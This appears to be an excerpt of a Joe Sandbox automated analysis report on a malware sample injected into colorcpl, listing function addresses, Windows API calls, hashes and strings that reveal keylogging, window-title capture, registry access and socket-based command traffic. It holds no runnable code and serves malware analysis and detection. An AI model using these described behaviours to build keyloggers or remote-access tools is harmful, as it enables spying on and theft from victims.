                                                                                                                              • Opcode Fuzzy Hash: 594039e39c0eb9f9cdd132cdc580df54091e31e6997f78c5ccbcef496ef24b98
                                                                                                                              • Instruction Fuzzy Hash: B1415D71608345ABEB14BB61C954DBFB7E9AF95314F40091DF89382290FF34B9098A6A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466A675 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0466A74D), ref: 0466A6AB
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0466A74D), ref: 0466A6BA
                                                                                                                              • Sleep.KERNEL32(00002710,?,?,?,0466A74D), ref: 0466A6E7
                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0466A74D), ref: 0466A6EE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$ChangeCloseCreateFindNotificationSizeSleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4068920109-0
                                                                                                                              • Opcode ID: 99b92ef673309f2b0125254969fe8c888660c900ad547f0207e588a24f2517e3
                                                                                                                              • Instruction ID: 19de8a5399b88b163bdb14fad463aef8e45577df9980c89d085cf56188ca7564
                                                                                                                              • Opcode Fuzzy Hash: 99b92ef673309f2b0125254969fe8c888660c900ad547f0207e588a24f2517e3
                                                                                                                              • Instruction Fuzzy Hash: 7E115C70704340BEF731ABA49C98A2E3FAAFB47359F04140CE28396A81F664BC88C755
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04664FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocalTime.KERNEL32(?,046D5598,?,00000000,?,?,?,?,?,?,04675CC9,?,00000001,0000004C,00000000), ref: 04665030
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              • GetLocalTime.KERNEL32(?,046D5598,?,00000000,?,?,?,?,?,?,04675CC9,?,00000001,0000004C,00000000), ref: 04665087
                                                                                                                              Strings
                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0466501F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LocalTime
                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                              • API String ID: 481472006-1507639952
                                                                                                                              • Opcode ID: 90986a6f2c5f6f5178688d8ebdf216328ae381331f909d661a098bd349d9cc0b
                                                                                                                              • Instruction ID: 79da333b2547766ef525c6a47d85cd7d2f2e6bb1a4e8d2e117ad661cd424f876
                                                                                                                              • Opcode Fuzzy Hash: 90986a6f2c5f6f5178688d8ebdf216328ae381331f909d661a098bd349d9cc0b
                                                                                                                              • Instruction Fuzzy Hash: 24210561E102807BE700FB34E816B7E7B98E755308F44151DD84707294FA3DBA4887E7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046ABA37 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 66f28d6c866646a8e9bf4c20937463259760c86766aac60879c80bfb23a75ef1
                                                                                                                              • Instruction ID: 233cf81fef1863a71d25dcb3fe277913934aee51a0331b259385ecf81dd8aa74
                                                                                                                              • Opcode Fuzzy Hash: 66f28d6c866646a8e9bf4c20937463259760c86766aac60879c80bfb23a75ef1
                                                                                                                              • Instruction Fuzzy Hash: 5951C3B1E009099BDF10DFA4D844FAEBBB8EF15B14F040159E611A7290FA70BE65CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04664AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,0466547D,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B), ref: 04664B47
                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B,?,?,?,?,?,0466547D), ref: 04664B75
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EventObjectSingleWaitsend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3963590051-0
                                                                                                                              • Opcode ID: 126f041800a3469b6d674969d92a52763847f83e8cb163c7330601a78815eaab
                                                                                                                              • Instruction ID: a4a2e9481a94fe72f3aac2e283f469c206edbb280625665a6353f78e01bdc3be
                                                                                                                              • Opcode Fuzzy Hash: 126f041800a3469b6d674969d92a52763847f83e8cb163c7330601a78815eaab
                                                                                                                              • Instruction Fuzzy Hash: 7F214FB2900119ABEF04BBA0EC94DEEB77CBF14218B00451DE917A2190FE34BA09C6A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046735A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 046735CA
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 046735E7
                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 046735F2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: 8ae40fc9c9b95f246c1304958e4f23b7234f553c9782e8696362bdc5b5834130
                                                                                                                              • Instruction ID: f8566699b246a9af7779d541973b90b18c8d7ef02d27aafa730aed8622c760d3
                                                                                                                              • Opcode Fuzzy Hash: 8ae40fc9c9b95f246c1304958e4f23b7234f553c9782e8696362bdc5b5834130
                                                                                                                              • Instruction Fuzzy Hash: 5F0162BAA00128BBCB209A95DD49DEE7F7DDF84650F004159BF05E2200FA759E99DBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046736F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,046D52F0), ref: 04673714
                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0467372D
                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 04673738
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: bc8107955a38b83668a2e5b2dd5d36ab518777e7c2a10918fbcd8bcc2f055d47
                                                                                                                              • Instruction ID: f1ebd8493069869427885226bfe24ef27fbbc54f26b26b010f3b2bbfdba88920
                                                                                                                              • Opcode Fuzzy Hash: bc8107955a38b83668a2e5b2dd5d36ab518777e7c2a10918fbcd8bcc2f055d47
                                                                                                                              • Instruction Fuzzy Hash: 2A0146B1800129FBDF219FA1EC48DEA7F78EF15750F004158BE0862210F63299A9EBE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04673549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04673569
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,046D52F0), ref: 04673587
                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 04673592
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: d1b6c3cecfebcf7b9d7d1af29b3c6fa2c1258453584b3e9bcef9e4c733b3712c
                                                                                                                              • Instruction ID: 05190e63dd937675ccadc831120cace18a8d229c83d0203fba7c2cb7ec8f0a69
                                                                                                                              • Opcode Fuzzy Hash: d1b6c3cecfebcf7b9d7d1af29b3c6fa2c1258453584b3e9bcef9e4c733b3712c
                                                                                                                              • Instruction Fuzzy Hash: D8F0A976900218BFEF109EA09D45FEA7BBCEB44710F104195BE05E6241E6755E98EB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046734FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0466C19C,046C6C48), ref: 04673516
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0466C19C,046C6C48), ref: 0467352A
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0466C19C,046C6C48), ref: 04673535
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: 7b0129c3d2222c720a61117038f452639464ef2027e5b1ce521cf3f6f481e37b
                                                                                                                              • Instruction ID: fc78f3e5f80dbdedf372035dff9b912552af5f9ef527519fdabb381caff05dba
                                                                                                                              • Opcode Fuzzy Hash: 7b0129c3d2222c720a61117038f452639464ef2027e5b1ce521cf3f6f481e37b
                                                                                                                              • Instruction Fuzzy Hash: 2BE06571905138BB9F204BA29C0DDEB7F6CDF06BA0B000144BE0D91200E2255E94E6E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04673877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04673885
                                                                                                                              • RegSetValueExA.KERNEL32(?,000000AF,00000000,00000004,00000001,00000004,?,?,?,0466C152,046C6C48,00000001,000000AF,Function_000660A4), ref: 046738A0
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0466C152,046C6C48,00000001,000000AF,Function_000660A4), ref: 046738AB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1818849710-0
                                                                                                                              • Opcode ID: b77c55b660ccc7cbef0c15fee708b60ece19f2d4f49082ff47a1faf823a2aa80
                                                                                                                              • Instruction ID: 032b695466c1490476e8a0b4f92c6d03e895294f0072f55d484f908086437a04
                                                                                                                              • Opcode Fuzzy Hash: b77c55b660ccc7cbef0c15fee708b60ece19f2d4f49082ff47a1faf823a2aa80
                                                                                                                              • Instruction Fuzzy Hash: 89E03072500218FBEF115E909C05FEA7B6CDF04750F004154FF05A6240E2399E98EBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04664B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,046D4EF8,04664C49,00000000,?,?,?,046D4EF8,0466530B), ref: 04664BA5
                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0466548B), ref: 04664BC3
                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 04664BDA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EventObjectSingleWaitrecv
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 311754179-0
                                                                                                                              • Opcode ID: bf1f7afac80dd98004f718d495bf5e9bc3cee6f345dfa24821bbec6eea049b26
                                                                                                                              • Instruction ID: 2752b615850688cc65150a5a0053b7c10cdd0da989f460eb1ef3321a9a6e6a0d
                                                                                                                              • Opcode Fuzzy Hash: bf1f7afac80dd98004f718d495bf5e9bc3cee6f345dfa24821bbec6eea049b26
                                                                                                                              • Instruction Fuzzy Hash: F4F08276118212BFDB059B10FC48F49FB66FB85720F10861AF511522A0EB72BC64DBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0467B7CA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: GlobalMemoryStatus
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 1890195054-2766056989
                                                                                                                              • Opcode ID: 052a28b7c8defe371efb58e33aae5ea0a891187f7cee39daba35b28a16f55463
                                                                                                                              • Instruction ID: 24f01c2f939f861b70af8df85cc8e4c357a4de8ad9de5488374fccbce0bd84ee
                                                                                                                              • Opcode Fuzzy Hash: 052a28b7c8defe371efb58e33aae5ea0a891187f7cee39daba35b28a16f55463
                                                                                                                              • Instruction Fuzzy Hash: C6D017B58023189FC720DFA8E804A8DBBFCFB08210F00416AEC49E3700E774AC008B84
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04675AEA Relevance: 3.2, APIs: 2, Instructions: 163COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CountEventTick
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 180926312-0
                                                                                                                              • Opcode ID: c5917da4d85c25f65e26fdbe86fd60581c062fa1cdfd906e5a11d1ad0ef08a3d
                                                                                                                              • Instruction ID: fb9a64e1978622389ac3b4dd57950c39fed2c83a1d762b6cc682697536c4b0ed
                                                                                                                              • Opcode Fuzzy Hash: c5917da4d85c25f65e26fdbe86fd60581c062fa1cdfd906e5a11d1ad0ef08a3d
                                                                                                                              • Instruction Fuzzy Hash: 3B519F716082019BE724FB71D8A0AFFB3E5AF91618F50492DE547871D0FF30B90AC68A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046AB652 Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,?,046ABB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 046AB6ED
                                                                                                                              • GetLastError.KERNEL32(?,046ABB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0469CE84,?,046D4EF8,?,83EC8B55,?,458B2CEC), ref: 046AB716
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 442123175-0
                                                                                                                              • Opcode ID: d1480167b25fcf4b811903955e45f4179ce24e78577782b2dfab9656a102c729
                                                                                                                              • Instruction ID: 4353118c3f994cfce513196a3114128f1736cb20acfc77f33cff0deabc228f84
                                                                                                                              • Opcode Fuzzy Hash: d1480167b25fcf4b811903955e45f4179ce24e78577782b2dfab9656a102c729
                                                                                                                              • Instruction Fuzzy Hash: A421B135A006199FCB14CF69D880BE9B3F8FB48702F1448AAEA46D7251E770BD95CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • socket.WS2_32(?,00000001,00000006), ref: 04664852
                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,00000000,?,04665379,?,?,00000000,?,0466530B,?,Keylogger initialization failure: error ), ref: 0466488E
                                                                                                                                • Part of subcall function 0466489E: WSAStartup.WS2_32(00000202,00000000), ref: 046648B3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateEventStartupsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1953588214-0
                                                                                                                              • Opcode ID: bc88a38efdede68a2dea8e802bfda07907c7a24057e2a845402449cd5968b10f
                                                                                                                              • Instruction ID: 92123e0a427e1add6f51bf90136b3a66ab1f1cce5e723bdaa35901cce91bca27
                                                                                                                              • Opcode Fuzzy Hash: bc88a38efdede68a2dea8e802bfda07907c7a24057e2a845402449cd5968b10f
                                                                                                                              • Instruction Fuzzy Hash: 8E01B170808B808ED7348F28A4443867FE0EB15304F04595EF0CA83B80E7B5A441CB14
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 0467BAB8
                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0467BACB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ForegroundText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 29597999-0
                                                                                                                              • Opcode ID: f375770c2d8bc422c8b4eefe2f77404aca74e48e579bee695206cdf602399c03
                                                                                                                              • Instruction ID: 268232c0418743fc5bbd35f7eb9d69cd4e5a1f7ed3a4212bfef2295fd017f0bd
                                                                                                                              • Opcode Fuzzy Hash: f375770c2d8bc422c8b4eefe2f77404aca74e48e579bee695206cdf602399c03
                                                                                                                              • Instruction Fuzzy Hash: 47E09271A0032827EB20A6A4DC8DFE9776CEB04704F000099B619D2181FDA46D448BE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04674EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,046D2ADC,046D50E4,00000000,04675188,00000000,00000001), ref: 04674F0B
                                                                                                                              • WSASetLastError.WS2_32(00000000), ref: 04674F10
                                                                                                                                • Part of subcall function 04674D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04674DD5
                                                                                                                                • Part of subcall function 04674D86: LoadLibraryA.KERNEL32(?), ref: 04674E17
                                                                                                                                • Part of subcall function 04674D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E37
                                                                                                                                • Part of subcall function 04674D86: FreeLibrary.KERNEL32(00000000), ref: 04674E3E
                                                                                                                                • Part of subcall function 04674D86: LoadLibraryA.KERNEL32(?), ref: 04674E76
                                                                                                                                • Part of subcall function 04674D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E88
                                                                                                                                • Part of subcall function 04674D86: FreeLibrary.KERNEL32(00000000), ref: 04674E8F
                                                                                                                                • Part of subcall function 04674D86: GetProcAddress.KERNEL32(00000000,?), ref: 04674E9E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1170566393-0
                                                                                                                              • Opcode ID: 7608002e10e12cccda6423f2a8547e05c26864cf6e2ea6eef58e3ce23efb87f3
                                                                                                                              • Instruction ID: 5ded66d8cdb263023c26accde1fe116b1765c7a38d61c542cf90f5776efab29a
                                                                                                                              • Opcode Fuzzy Hash: 7608002e10e12cccda6423f2a8547e05c26864cf6e2ea6eef58e3ce23efb87f3
                                                                                                                              • Instruction Fuzzy Hash: 0CD05B326015216F9320A65D9C04EBBD69CDFD77747051027F900D3100FA94AC4187F0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466D069 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0466EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,046C60BC,00000003,00000000), ref: 0466D078
                                                                                                                              • GetLastError.KERNEL32 ref: 0466D083
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1925916568-0
                                                                                                                              • Opcode ID: 1c1563ffa5383d48a75418b9266a30cd73a33eb2fe7def2c3ddce8972f455712
                                                                                                                              • Instruction ID: 466b1fc538f9ffd6e8ae3dd15adea117c54724b2b14c0a557207615c02ca7118
                                                                                                                              • Opcode Fuzzy Hash: 1c1563ffa5383d48a75418b9266a30cd73a33eb2fe7def2c3ddce8972f455712
                                                                                                                              • Instruction Fuzzy Hash: 86D012F0E15200ABFB181B70945975839A4D744702F40141DF207D59C0FA788CD48551
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04669DE4 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcslen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 176396367-0
                                                                                                                              • Opcode ID: f20fe28be105365bd72796de1a0bf666a86eb82769a796abaf9954a45737d45e
                                                                                                                              • Instruction ID: a0a53d2bb4af06a93d1f6059155590b9da558a1ff6cd3854083e08710af51134
                                                                                                                              • Opcode Fuzzy Hash: f20fe28be105365bd72796de1a0bf666a86eb82769a796abaf9954a45737d45e
                                                                                                                              • Instruction Fuzzy Hash: 2B119D719002099FEB05EF64E8518EFBBF5EF58218B10001EE80796290FF74BD19CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046AC602 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __wsopen_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3347428461-0
                                                                                                                              • Opcode ID: 4122f9f1ac1aaced518aeb6e0aa7ba6cb8aaa715819e4df93ff3bf146f385614
                                                                                                                              • Instruction ID: b1c937b673abc72507dead5a52ff60f2576c980197ea7dab7f2605919294721a
                                                                                                                              • Opcode Fuzzy Hash: 4122f9f1ac1aaced518aeb6e0aa7ba6cb8aaa715819e4df93ff3bf146f385614
                                                                                                                              • Instruction Fuzzy Hash: 05111875A0410AAFCB05DF58E9449DA7BF8EF48314F1540A9F809AB311E671EE21CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B5B6A Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
